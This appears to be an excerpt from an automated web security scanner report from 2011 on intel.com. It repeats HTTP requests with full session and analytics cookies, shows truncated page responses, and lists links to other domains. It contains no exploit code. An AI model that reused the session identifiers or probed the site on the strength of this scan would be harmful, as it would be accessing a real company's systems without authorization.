INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:19:59 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36094
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
GET /consumer/shop/processors/index.htm?iid=subhdr+shop_proc HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:06 GMT Content-Length: 29190 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /consumer/shop/service-providers.htm?iid=subhdr+shop_serviceproviders HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:06 GMT Content-Length: 32458 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
GET /consumer/shop/ssds.htm?iid=subhdr+shop_storage HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:06 GMT Content-Length: 27030 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /consumer/tomorrow/index.htm?iid=gg_play+home_sot HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36511
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /consumer/tomorrow/innovators/index.htm?iid=subhdr+sot_innovators HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 36041
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /consumer/tomorrow/stories/index.htm?iid=subhdr+sot_inteltoday HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 32885
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr+invrel
Request
GET /consumer/tomorrow/tvads/index.htm?iid=subhdr+sot_tvvideo HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:20:05 GMT Connection: close Connection: Transfer-Encoding Content-Length: 37537
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US">
The response contains the following link to another domain:
http://www.intc.com/index.cfm?iid=ftr-UK+invrel
Request
GET /corporate/europe/emea/irl/intel/index.htm?iid=gg_en_IE+noscript HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:22 GMT Content-Length: 24236 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="en-us"> <head> <title>Intel Ireland</title> <meta http-equiv='Content-T ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr-UK+invrel">Investor Relations</a> ...[SNIP]...
The response contains the following links to other domains:
http://www.intc.com/index.cfm?iid=ftr-LA+invrel
http://www.worldmuralproject.com/
Request
GET /costarica/index.htm?iid=gg_es_CR+noscript HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; intelresearchSTG=sid%3D9968985447329M1296947538033%26stage%3D13; wa_visitId=%7Bbec98047-4063-22c9-9ea2-60a3f75f6fc2%7D; s_vi=[CS]v1|26A6E824051490CF-6000014E40302B1B[CE]; __utma=1.167981993.1296947562.1296947562.1296947562.1; INTELHistoryTracker=http%3A//www.intel.com/%3Fen_US_01:Laptop%2C%20Notebook%2C%20Desktop%2C%20Server%20and%20Embedded%20Processor%20Technology%20-%20Intel,http%3A//www.intel.com/p/en_US/business%3Fiid%3Dgg_work-en_US+home_business_portal:Intel%AE%20Products%20and%20Resources%20for%20Business,http%3A//www.intel.com/consumer/index.htm%3Fiid%3Dgg_play-en_US+home_consumer:Intel%20for%20Consumers,http%3A//www.intel.com/about/index.htm%3Fiid%3Dgg_about-en_US+intel_aboutintel:All%20About%20Intel,http%3A//newsroom.intel.com/community/intel_newsroom/%3Fiid%3Dftr+press:Intel%20Newsroom%20%7C%20Top%20headlines%2C%20breaking%20news%20and%20current%20events%20from%20Intel; __utmc=1; __utmb=1.2.10.1296947562; cf=0;
Response
HTTP/1.1 200 OK Server: IA Web Server P3P: CP="CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa OUR STP ONL UNI COM NAV INT DEM STA PRE" Content-Type: text/html Date: Sat, 05 Feb 2011 23:18:19 GMT Content-Length: 27632 Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html lang="es-MX"> <head> <title>Todo acerca de Intel</title> <meta http-equiv='Co ...[SNIP]... <li><a href="http://www.worldmuralproject.com" target="_blank"><strong> ...[SNIP]... <li><a href="http://www.intc.com/index.cfm?iid=ftr-LA+invrel">Relaciones con inversores</a> ...[SNIP]...
GET /design/network/ica/index.htm?iid=subhdr+ptr_embed_alliance HTTP/1.1 Host: www.intel.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: s_lv=1296947643351; JSESSIONID=D88914679EF85459F2500510E78BDC11.node6IPR; __utmv=; intelresearchSTGref=NONE; AnonymousGuest=B9E7250CFE3F45e9A390C16357BB10EB155; __utmz=1.1296947562.1.1.utmcsr=intel.com|utmccn=(referral)|utmcmd=referral|utmcct=/; countrylang=United%20States%20-%20English; s_sq=intelnewscorp%2Cintelnewsglobal%3D%2526pid%253Dcorp%25253Anewsroom/community/intel_newsroom/%25253Fiid%25253Dftr%25252Bpress%2526pidt%253D1%2526oid%253Dhttp%25253A//www.intel.com/about/corporateresponsibility/index.htm%25253Fiid%25253Dsubhdr%25252Bcr%2526ot%253DA%26intelcorpconsumer%2Cintelcorpglobalconsumer%3D%2526pid%253Dcons%25253A/consumer/index.htm%2526pidt%253D1%2526oid%253Dhttp%25253A//newsroom.intel.com/%25253Fiid%25253Dftr%25252Bpress%2526ot%253DA; ASPSESSIONIDCQTTTSCR=FFEDENPAGHHPMHKNIABOGJAF; s_lv_s=Less%20than%201%20day; gpv_p18=cim%3A/about/corporateresponsibility/index.htm; s_cc=true; 